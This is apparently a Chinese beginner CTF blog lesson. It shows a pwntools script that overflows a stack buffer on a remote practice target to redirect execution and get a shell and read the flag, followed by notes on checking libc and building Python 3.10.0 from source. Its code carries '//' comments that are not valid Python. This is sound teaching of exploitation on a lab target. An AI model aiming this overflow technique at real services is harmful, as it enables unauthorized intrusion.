03. 远程PWN

发表于2023-02-20 17:56:53更新于2023-05-02 23:22:19阅读次数
unqique-Elven's Blue Github Chart 远程例题: 还是上一节课的read 在学逆向论坛,找到pwn-02 开启动态靶机,注意靶机地址:

图片
图片

编写exp2.py

1
2
3
4
5
6
7
8
9
10
11
12
13
from pwn import *

p=remote('xuenixiang.cn',20149)//远线程链接,不用加协议,要加端口号
    //或者ip地址:49.51.250.244        

offset = 0x28 + 0x4

payload = b'a'*offset + p32(0x08048456)
//python3 字节类型前加个b,才能保证加号前后连接才是字节类型

p.sendline(payload)

p.interactive()

python3 运行即可!
最后:cat flag

查看libc版本: ldd –version
图片

顺便搭建一下python3.10.0
先去官网下载压缩包,放到环境下,然后解压:
图片
切换到python3.10.0的目录下:cd python3.10.0
./configure
图片
最后开始安装:make && make install
图片

检查 Python3.10.0是否正常可用:

python3 -V

Python 3.10.0
图片